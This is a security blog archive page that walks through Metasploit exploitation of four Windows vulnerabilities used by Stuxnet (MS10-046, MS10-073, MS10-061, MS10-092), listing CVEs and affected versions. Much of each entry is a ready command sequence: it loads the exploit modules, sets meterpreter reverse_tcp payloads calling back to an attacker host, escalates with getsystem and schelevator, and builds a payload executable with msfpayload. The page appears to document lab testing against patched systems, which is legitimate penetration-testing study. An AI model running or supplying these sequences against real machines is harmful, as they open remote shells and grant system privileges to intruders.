Tag Archives: Stuxnet

MS10-046 : Microsoft Windows Shell LNK Execution

Timeline :

Vulnerability discovered exploited in the wild, part of the Stuxnet worm
Metasploit PoC provided the 2010-07-19

PoC provided by :

hdmoore
jduck
B_H

Reference(s) :

CVE-2010-2568
MS10-046

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP1 et Windows Vista SP2
Windows Vista x64 Edition SP1 et Windows Vista x64 Edition SP2
Windows Server 2008 32 et Windows Server 2008 32 SP2
Windows Server 2008 x64 et Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

Tested on Windows XP SP3

Description :

This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

Commands :

use windows/browser/ms10_046_shortcut_icon_dllloader
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-073 : Microsoft Windows Keyboard Layout Privilege Escalation

Timeline :

Vulnerability disclosed by Microsoft the 2010-10-12
Microsoft patch “KB981957” provided the 2010-10-12
Exploit-DB PoC provided by Ruben Santamarta the 2011-01-13
Metasploit PoC provided by jduck the 2011-01-17

PoC provided by :

Ruben Santamarta
jduck

Reference(s) :

CVE-2010-2743
MS10-073

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 Edition SP1 and Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit SP2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based SP2
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems

Tested on Windows XP SP3

Description :

This module exploits the keyboard layout 0day exploited by Stuxnet. When processing specially crafted keyboard layout files (DLLs), the Windows kernel fails to validate that an array index is within the bounds of the array. By loading a specially crafted keyboard layout, an attacker can execute code in Ring 0.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
ifconfig
set LHOST 192.168.178.21
exploit -j

sessions
sessions -i 1
getuid
getsystem
ps
migrate xxxx
background

use post/windows/escalate/ms10_073_kbdlayout
info
show options
set SESSION 1
exploit

sessions -i 1
getuid
getsystem
shell

MS10-061 : Microsoft Print Spooler Service Impersonation Vulnerability

Timeline :

Vulnerability exploited by the StuxNet worm
Security update released by Microsoft (KB2347290) the 2010-09-14
Metasploit PoC released the 2010-09-17

    PoC provided by :

jduck
hdm

    Reference(s) :

CVE-2010-2729
MS10-061

    Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

    Tested on Windows XP SP3

    Description :

This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes an EXE and then (ab)uses the impersonation vulnerability a second time to create a secondary RPC connection to the \PIPE\ATSVC named pipe. We then proceed to create a remote AT job using a blind NetrJobAdd RPC call.

    Commands :

use exploit/windows/smb/ms10_061_spoolss
nmap 192.168.178.41
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig

MS10-092 : Microsoft Windows Task Scheduler Privilege Escalation

Timeline :

webDEViL 0day release on Exploit-DB the 2010-11-20
Metasploit exploit released the 2010-11-20

    PoC provided by :

webDEViL
jduck

    Reference(s) :

CVE-2010-3338
EDB-ID-15589
MS10-092

    Affected version(s) :

Should work on Vista/Win7/2008 x86/x64

    Tested on Windows 7 Integral

    Description :

Stuxnet is not yet inhume, on four discovered 0day, only three of them where patched by Microsoft during the October second Tuesday. The last one has beenĀ reveled by webDEViL the 21 October on Exploit-DB, and one day later, this new still unpatched 0day, has been integrated into Metasploit by Rapid7 team.

This vulnerability permit to a local unprivileged user to do a “privilege escalation” attack by running the Windows scheduler on Windows Vista, Seven and 2008.

Here under a video demonstrating the privilege escalation between an another 0day disclosed by Corelan Team on Foxit PDF Reader.

    Commands :

Foxit PDF Reader exploitation

use exploit/windows/fileformat/foxit_title_bĀ­of
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sysinfo
getuid
getprivs

Creating a test.exe containing a reverse_tcp meterpreter payload

sudo msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.178.21 X test.exe

Launching a second multi handler listener with msfcli

sudo msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.178.21 E

Running schelevator to gain system privileges

run schelevator -u test.exe

getuid
getprivs